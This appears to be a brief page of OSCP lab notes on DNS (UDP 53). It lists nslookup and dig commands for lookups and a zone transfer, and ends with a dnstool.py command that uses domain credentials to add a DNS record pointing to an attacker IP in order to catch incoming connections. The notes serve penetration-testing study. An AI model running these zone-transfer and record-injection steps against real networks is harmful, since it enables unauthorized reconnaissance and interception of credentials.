📡

DNS (Udp 53)

Notes from oscp.adot8.com — services.

#services#adot8
source · oscp.adot8.com · services/dns-less-than-udp-53-greater-than

DNS <udp 53>

code
01nslookup
02> server <IP>
03> <IP>
code
01dig axfr adot8.htb @<IP>
code
01dig +noall +answer -x 127.0.0.1 @192.168.172.148

Add a dns entry, and listen for calls on a port

code
01python dnstool.py -u 'adot8.htb\tiffany -p pwd -r webad0t8.adot8.htb -a add -t A -d <AttackerIP> <DCIP>>